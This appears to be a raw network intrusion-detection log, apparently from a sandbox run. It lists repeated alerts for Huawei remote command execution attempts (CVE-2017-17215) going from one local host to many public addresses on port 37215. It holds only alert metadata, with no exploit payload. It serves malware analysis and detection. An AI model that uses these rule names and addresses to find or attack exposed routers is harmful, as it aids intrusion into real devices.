                                                        06/13/24-21:32:19.730329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181637215192.168.2.1441.89.88.39
                                                        06/13/24-21:33:09.129769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664437215192.168.2.14156.226.193.181
                                                        06/13/24-21:32:15.607654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237237215192.168.2.14197.15.245.188
                                                        06/13/24-21:32:30.074373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904837215192.168.2.1441.97.104.47
                                                        06/13/24-21:32:30.099204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336637215192.168.2.14197.196.150.95
                                                        06/13/24-21:32:52.669952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885637215192.168.2.14197.192.84.189
                                                        06/13/24-21:33:02.914738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775837215192.168.2.14197.20.24.186
                                                        06/13/24-21:33:15.254628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464037215192.168.2.1441.177.26.204
                                                        06/13/24-21:32:15.604408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424237215192.168.2.14156.94.155.98
                                                        06/13/24-21:32:19.729166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974437215192.168.2.14197.81.133.136
                                                        06/13/24-21:32:15.610450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548237215192.168.2.14197.200.68.72
                                                        06/13/24-21:33:07.055889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051037215192.168.2.1441.216.148.33
                                                        06/13/24-21:32:13.543023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334837215192.168.2.14156.27.225.208
                                                        06/13/24-21:32:30.126759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317037215192.168.2.14197.46.143.193
                                                        06/13/24-21:32:30.077483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365237215192.168.2.14197.130.187.166
                                                        06/13/24-21:32:56.755554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296037215192.168.2.14197.181.46.73
                                                        06/13/24-21:33:02.937360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405037215192.168.2.14197.48.87.126
                                                        06/13/24-21:32:48.569899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046837215192.168.2.14156.217.234.103
                                                        06/13/24-21:32:32.169235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804437215192.168.2.14197.201.118.10
                                                        06/13/24-21:32:13.545865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551837215192.168.2.14156.235.150.174
                                                        06/13/24-21:33:11.181046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041637215192.168.2.14156.172.103.100
                                                        06/13/24-21:32:01.220569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026837215192.168.2.14156.212.38.36
                                                        06/13/24-21:33:13.212803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244237215192.168.2.14156.69.189.166
                                                        06/13/24-21:32:28.027564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002837215192.168.2.14197.125.140.233
                                                        06/13/24-21:32:21.785303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.14197.253.85.64
                                                        06/13/24-21:32:54.725233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246437215192.168.2.14156.3.20.93
                                                        06/13/24-21:33:05.012158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643437215192.168.2.1441.128.139.168
                                                        06/13/24-21:32:01.225039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258237215192.168.2.14156.105.95.62
                                                        06/13/24-21:32:30.100246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204437215192.168.2.14197.162.107.78
                                                        06/13/24-21:32:11.508818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594237215192.168.2.14197.246.209.31
                                                        06/13/24-21:32:30.074446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521837215192.168.2.14156.187.124.28
                                                        06/13/24-21:32:07.415650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369437215192.168.2.14156.177.102.99
                                                        06/13/24-21:32:34.196512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.14197.61.3.34
                                                        06/13/24-21:32:28.027984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349237215192.168.2.14197.228.51.188
                                                        06/13/24-21:32:38.321259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183437215192.168.2.14197.158.180.29
                                                        06/13/24-21:31:57.093757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213637215192.168.2.1441.200.53.47
                                                        06/13/24-21:32:07.415414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829637215192.168.2.14197.44.66.170
                                                        06/13/24-21:32:15.611501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649237215192.168.2.14156.48.124.6
                                                        06/13/24-21:32:36.245111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665237215192.168.2.14156.145.121.154
                                                        06/13/24-21:32:05.378607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248037215192.168.2.14156.119.57.145
                                                        06/13/24-21:33:00.883983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754637215192.168.2.1441.240.131.182
                                                        06/13/24-21:32:01.220938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482237215192.168.2.1441.159.91.0
                                                        06/13/24-21:32:23.945349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312637215192.168.2.1441.86.136.121
                                                        06/13/24-21:32:40.357266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444037215192.168.2.14156.20.104.55
                                                        06/13/24-21:32:07.400845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408237215192.168.2.14156.15.5.165
                                                        06/13/24-21:32:32.155437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568437215192.168.2.1441.96.247.249
                                                        06/13/24-21:33:09.107826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885037215192.168.2.1441.240.14.28
                                                        06/13/24-21:32:05.349409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387037215192.168.2.1441.218.64.215
                                                        06/13/24-21:32:21.800648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560437215192.168.2.14156.225.233.45
                                                        06/13/24-21:32:46.508215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875637215192.168.2.14197.198.201.156
                                                        06/13/24-21:32:25.995989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664237215192.168.2.1441.2.5.76
                                                        06/13/24-21:32:17.693915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541037215192.168.2.1441.3.149.33
                                                        06/13/24-21:31:59.177695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364637215192.168.2.14197.116.183.242
                                                        06/13/24-21:33:04.990049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618837215192.168.2.14156.167.188.224
                                                        06/13/24-21:33:09.131094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006437215192.168.2.14156.50.17.35
                                                        06/13/24-21:32:38.321122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271037215192.168.2.1441.108.44.2
                                                        06/13/24-21:32:05.345979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468237215192.168.2.14156.207.127.142
                                                        06/13/24-21:32:23.933127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072437215192.168.2.1441.253.182.161
                                                        06/13/24-21:32:40.358846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327037215192.168.2.1441.203.220.51
                                                        06/13/24-21:32:48.550670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846837215192.168.2.14197.27.93.44
                                                        06/13/24-21:32:52.658031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627237215192.168.2.1441.120.150.82
                                                        06/13/24-21:32:05.368896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256237215192.168.2.14156.71.151.89
                                                        06/13/24-21:32:44.457148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347037215192.168.2.1441.128.83.155
                                                        06/13/24-21:32:54.724608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350637215192.168.2.14156.217.123.103
                                                        06/13/24-21:32:56.785879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320837215192.168.2.14197.103.173.145
                                                        06/13/24-21:32:30.099978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741437215192.168.2.1441.255.175.232
                                                        06/13/24-21:33:17.309570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763637215192.168.2.14197.136.135.155
                                                        06/13/24-21:32:42.423111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288837215192.168.2.14197.159.26.177
                                                        06/13/24-21:32:09.453420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433837215192.168.2.1441.55.229.244
                                                        06/13/24-21:32:13.567950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526437215192.168.2.14197.167.116.171
                                                        06/13/24-21:32:54.711008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198837215192.168.2.14197.152.48.55
                                                        06/13/24-21:32:07.404119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414437215192.168.2.1441.52.187.220
                                                        06/13/24-21:32:19.754281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834037215192.168.2.1441.50.44.243
                                                        06/13/24-21:31:59.175407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394037215192.168.2.14156.139.143.212
                                                        06/13/24-21:32:44.457030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385637215192.168.2.14156.59.207.47
                                                        06/13/24-21:32:17.695846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658437215192.168.2.1441.79.196.214
                                                        06/13/24-21:32:30.094686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582637215192.168.2.1441.31.147.94
                                                        06/13/24-21:33:17.304565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434037215192.168.2.1441.10.136.221
                                                        06/13/24-21:33:11.181075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297437215192.168.2.1441.154.97.245
                                                        06/13/24-21:33:13.212865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977837215192.168.2.14156.0.153.164
                                                        06/13/24-21:32:13.570394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885637215192.168.2.14156.98.214.185
                                                        06/13/24-21:32:38.302329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884037215192.168.2.1441.110.38.1
                                                        06/13/24-21:32:32.156651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775837215192.168.2.14156.108.30.200
                                                        06/13/24-21:33:00.889822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853237215192.168.2.14156.189.254.218
                                                        06/13/24-21:33:04.993825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031637215192.168.2.1441.185.96.231
                                                        06/13/24-21:32:21.785654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600437215192.168.2.1441.127.241.106
                                                        06/13/24-21:33:02.954199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895837215192.168.2.14156.90.190.39
                                                        06/13/24-21:32:34.212528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.1441.169.252.114
                                                        06/13/24-21:32:01.248705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156237215192.168.2.14197.245.22.135
                                                        06/13/24-21:32:44.474165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603237215192.168.2.1441.159.88.63
                                                        06/13/24-21:32:44.474678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025037215192.168.2.14156.231.128.87
                                                        06/13/24-21:33:11.154509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573437215192.168.2.1441.39.14.114
                                                        06/13/24-21:32:50.609821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756037215192.168.2.14156.68.246.235
                                                        06/13/24-21:32:21.785150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718837215192.168.2.14197.25.197.33
                                                        06/13/24-21:32:21.802716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865837215192.168.2.14156.133.172.33
                                                        06/13/24-21:32:30.078044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283237215192.168.2.14197.36.208.43
                                                        06/13/24-21:32:50.614671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093637215192.168.2.14197.147.233.74
                                                        06/13/24-21:32:30.073881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062437215192.168.2.1441.51.162.142
                                                        06/13/24-21:33:13.228553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14197.90.113.232
                                                        06/13/24-21:32:50.632030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479037215192.168.2.14156.126.120.152
                                                        06/13/24-21:32:28.024390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.14197.175.35.212
                                                        06/13/24-21:32:36.245950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590037215192.168.2.14156.235.177.231
                                                        06/13/24-21:31:57.136428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291837215192.168.2.14156.86.41.94
                                                        06/13/24-21:32:25.995803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998437215192.168.2.14156.197.6.81
                                                        06/13/24-21:32:38.316434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429437215192.168.2.14156.84.161.15
                                                        06/13/24-21:32:46.525565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768637215192.168.2.14156.204.113.144
                                                        06/13/24-21:32:30.125627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725437215192.168.2.14197.212.117.102
                                                        06/13/24-21:32:23.934532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724037215192.168.2.1441.69.101.45
                                                        06/13/24-21:32:48.551461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648437215192.168.2.1441.102.143.66
                                                        06/13/24-21:32:36.248584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.1441.140.21.111
                                                        06/13/24-21:32:05.371255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873437215192.168.2.14197.20.5.166
                                                        06/13/24-21:32:17.671189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737837215192.168.2.14156.63.137.143
                                                        06/13/24-21:32:32.169015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293437215192.168.2.1441.223.131.58
                                                        06/13/24-21:32:13.546507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314037215192.168.2.1441.172.134.106
                                                        06/13/24-21:32:25.993163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225837215192.168.2.1441.227.133.98
                                                        06/13/24-21:32:05.347035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243037215192.168.2.14197.145.192.245
                                                        06/13/24-21:33:07.054971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331237215192.168.2.1441.125.128.182
                                                        06/13/24-21:32:01.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882837215192.168.2.1441.99.47.11
                                                        06/13/24-21:32:56.758666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717437215192.168.2.1441.110.218.247
                                                        06/13/24-21:33:13.212040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990237215192.168.2.1441.51.137.88
                                                        06/13/24-21:32:30.079388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.14197.31.63.72
                                                        06/13/24-21:32:15.634618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067837215192.168.2.14156.164.42.37
                                                        06/13/24-21:32:56.755768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685837215192.168.2.14156.11.254.223
                                                        06/13/24-21:33:13.211634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125837215192.168.2.1441.95.52.55
                                                        06/13/24-21:32:25.996237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3560837215192.168.2.14197.214.131.142
                                                        06/13/24-21:33:09.106689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092637215192.168.2.1441.120.190.255
                                                        06/13/24-21:32:44.458476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335237215192.168.2.14197.164.24.116
                                                        06/13/24-21:32:44.480310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009837215192.168.2.14197.176.195.164
                                                        06/13/24-21:32:36.268543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.1441.60.146.150
                                                        06/13/24-21:31:57.092274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733637215192.168.2.14197.207.180.13
                                                        06/13/24-21:32:50.629651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534437215192.168.2.14197.186.32.237
                                                        06/13/24-21:32:19.728783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162637215192.168.2.1441.142.55.11
                                                        06/13/24-21:32:38.321399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036637215192.168.2.14197.157.145.120
                                                        06/13/24-21:33:09.110658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754437215192.168.2.14156.51.91.19
                                                        06/13/24-21:32:05.344685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928037215192.168.2.14156.106.109.175
                                                        06/13/24-21:32:28.024653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583637215192.168.2.14156.176.24.173
                                                        06/13/24-21:32:30.096779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974437215192.168.2.14156.153.212.84
                                                        06/13/24-21:33:00.871374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659037215192.168.2.14197.224.139.118
                                                        06/13/24-21:32:09.456008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398837215192.168.2.14156.230.205.206
                                                        06/13/24-21:33:09.108990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317237215192.168.2.14156.204.174.121
                                                        06/13/24-21:32:58.838283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755637215192.168.2.1441.24.138.231
                                                        06/13/24-21:32:38.302897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832037215192.168.2.14197.155.214.139
                                                        06/13/24-21:33:09.111988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.1441.83.30.120
                                                        06/13/24-21:33:11.176220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213637215192.168.2.14156.186.248.171
                                                        06/13/24-21:32:32.165451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958637215192.168.2.14197.200.94.55
                                                        06/13/24-21:33:04.988819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14197.141.220.149
                                                        06/13/24-21:32:03.294890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605237215192.168.2.1441.221.133.250
                                                        06/13/24-21:32:42.409281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794237215192.168.2.14156.103.138.90
                                                        06/13/24-21:32:36.265591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287837215192.168.2.14156.178.92.34
                                                        06/13/24-21:32:44.452466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769037215192.168.2.1441.3.73.44
                                                        06/13/24-21:32:17.697010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806037215192.168.2.14156.176.153.161
                                                        06/13/24-21:32:36.263760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631437215192.168.2.1441.205.34.59
                                                        06/13/24-21:32:28.026232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420437215192.168.2.14156.121.0.152
                                                        06/13/24-21:33:07.056455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378437215192.168.2.1441.236.101.3
                                                        06/13/24-21:32:58.842590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105837215192.168.2.14156.83.229.244
                                                        06/13/24-21:32:11.485301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600037215192.168.2.1441.59.231.166
                                                        06/13/24-21:32:13.546217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582437215192.168.2.1441.192.220.144
                                                        06/13/24-21:32:46.510312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975837215192.168.2.14156.62.150.149
                                                        06/13/24-21:33:09.128811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494637215192.168.2.14156.3.26.53
                                                        06/13/24-21:33:17.307931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030437215192.168.2.14197.138.224.189
                                                        06/13/24-21:32:46.503936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.1441.72.68.78
                                                        06/13/24-21:32:21.782491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314837215192.168.2.14197.190.116.237
                                                        06/13/24-21:32:58.823565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088437215192.168.2.14197.101.93.123
                                                        06/13/24-21:33:02.936541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14197.142.147.135
                                                        06/13/24-21:32:56.790561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440837215192.168.2.1441.180.120.11
                                                        06/13/24-21:31:59.197572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697037215192.168.2.14156.96.157.43
                                                        06/13/24-21:32:40.357520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654237215192.168.2.14156.216.99.130
                                                        06/13/24-21:32:50.612201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.14197.191.71.130
                                                        06/13/24-21:32:17.672910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.14156.142.113.239
                                                        06/13/24-21:32:40.359424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.14197.140.33.223
                                                        06/13/24-21:33:11.175516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779837215192.168.2.1441.246.71.82
                                                        06/13/24-21:32:07.415752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784237215192.168.2.14197.253.110.40
                                                        06/13/24-21:32:13.547060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742637215192.168.2.14156.117.178.24
                                                        06/13/24-21:32:56.757116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616837215192.168.2.1441.126.144.156
                                                        06/13/24-21:32:32.153847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336037215192.168.2.1441.47.243.209
                                                        06/13/24-21:32:19.730855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601837215192.168.2.14156.60.66.161
                                                        06/13/24-21:32:17.697353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739437215192.168.2.14197.67.147.65
                                                        06/13/24-21:33:15.256332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593437215192.168.2.14156.107.22.103
                                                        06/13/24-21:32:09.436290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378837215192.168.2.14156.138.171.240
                                                        06/13/24-21:32:17.693864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477237215192.168.2.14197.246.37.48
                                                        06/13/24-21:32:01.223392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352037215192.168.2.14197.142.2.12
                                                        06/13/24-21:32:36.263991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364437215192.168.2.14156.60.161.89
                                                        06/13/24-21:32:54.724647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747237215192.168.2.14197.13.247.247
                                                        06/13/24-21:32:11.507197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618837215192.168.2.1441.106.186.75
                                                        06/13/24-21:32:28.045655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889437215192.168.2.14197.154.29.94
                                                        06/13/24-21:32:44.478129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694237215192.168.2.14197.232.241.166
